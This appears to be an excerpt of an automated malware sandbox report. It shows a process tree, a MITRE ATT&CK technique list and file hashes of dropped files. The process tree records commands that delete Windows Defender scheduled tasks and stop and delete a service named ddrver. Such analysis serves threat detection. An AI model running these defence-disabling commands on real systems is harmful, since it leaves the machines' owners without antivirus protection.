C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f5⤵PID:2692
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f5⤵PID:2704
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f5⤵PID:1948
-
-
C:\Windows\system32\sc.exesc stop ddrver5⤵
- Launches sc.exe
PID:1648
-
-
C:\Windows\system32\sc.exesc delete ddrver5⤵
- Launches sc.exe
PID:2768
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD52f0f5fb7efce1c965ff89e19a9625d60
SHA1622ff9fe44be78dc07f92160d1341abb8d251ca6
SHA256426b6e77a4d2e72edf8cd6177578a732ca05510b56cb58d938d6e25820dc2458
SHA512b8587d32e98693f08c9c3776ac4168204d76dd6db0d76c6afc815d6727d745f6137ae83fe85a7562517b37c320ddebc27167a9f3f14dacca33954dbe437dc920
-
Filesize
384KB
MD596edce400fb14537125231318fdd51d7
SHA12b926e42d545b7daa8712b197f102ac09ac93b0a
SHA256192465b8e516fcc40c847ee294397529958498c4747fc09c8a76d5ac68b6079b
SHA5124c4bbb93745fe8bdff03eda893c4c304fda6ca5c6dc59cd9b51d927391cf24c157b8aa9fbd73a4afb32d3d27c2d2adee92ad251ac258aa4c9216fdb124e7440f
-
Filesize
327KB
MD5dfbc5f5696ac1ed176979706f40923e8
SHA1b3ad04189502558184037ae150f1ae4e50927560
SHA25698d2ce957150f0163bc11537b259e37fda34304aa39702a331fad8070dbf97b5
SHA5120aa50d39b0f1cb7ee9c1e5004ce5aa3905317bdb605f8efdf13977abfce423292fe1acfb698504e36f567604a079c1fde8a1ff60b96141be5b969dfa018ae22f
-
Filesize
85KB
MD5658c7da5993886bcaf47bb57c1aee148
SHA18c22eda0524383ae8a4e171f9d70b3570611efa5
SHA25649f5b986dab68735abe616759dc72b6b2494e8ed17d6127789e1556e95551663
SHA512803f80f73afa21f8e3c83936e099717dae65398ef737da4088495b5a6095c2b1d963f3fcf12bb69c01f341b07736d28b16a385ab0773f3fb4330b6483704c173
-
Filesize
1KB
MD5e5ddb7a24424818e3b38821cc50ee6fd
SHA197931d19f71b62b3c8a2b104886a9f1437e84c48
SHA2564734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea
SHA512450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21
-
Filesize
717B
MD5fa330462f1b72ec9499400dff1b631b2
SHA1677c1bab7bea809584b170dfc097710a947fb73c
SHA2567f2b02aeb7f20f51aa6cc8d0e7dbffc8f86a6521f1d1b0ec095b73b932d9edbf
SHA512bc0acf5ea48e678de3bff8af26d386365cdbd9a327922cacce3eab168a1d7bbfbaa034c6c181f4dffe052db5ecae2533ad2c6d2aa83dfda90c50d1554c71b2a9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UQC4D5N3IC7YFL65L1YQ.temp
Filesize7KB
MD5d306dd29fcd8f610abe6e597fb285124
SHA18ec596fb854052075575c52fb559c9903bd06658
SHA256aceb05954d3d27443d083788023c90b87baa26424e088ebf0c627bce7e9de892
SHA512e3faa6f908b28d5007fd9c9448b896b9a5048e6fb098925e482fbbf3fa138f4c0bf2da46cbe1e9aeb371f078766e979628f11d1fe5541a4bb0d0f8005fc6dc88
-
Filesize
1.8MB
MD56ccf93c0cef65b2510ff1fcff52e7fb8
SHA13db6bf3e3f7ed0a0fb767b79171e9ad34c03b0d1
SHA2568da34a9f000b0b4e40a66e3aa4739b089b55b26a95a0eb58cc0bff7d67ed8021
SHA512757d0f599617574f2f08b8a1f252b9256b65c914c7f880479e86df9cdf39eb2bba1f4fcb9384d4915bd0fedc9cdbc7b5842cd95df8160d24a01e8d51ff836ae8
-
Filesize
45KB
MD5bfa322790bbb9985daefcc8f9d9de7bd
SHA18050dbb84ee9c86ec61d791eb5d404899e042bb1
SHA2566cf9141df8a3f2508a2b2010c5e1656bc0251be272f912547b6e0c318ba5454f
SHA5123ee4f0ac089e0652957a9cb66cd96b45f8b582393a38f2f000a22c1e53b97cc9686dff43b855ef6f56bfcde7c9c14df139bb3768a04a0fc97423d332d7053886
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502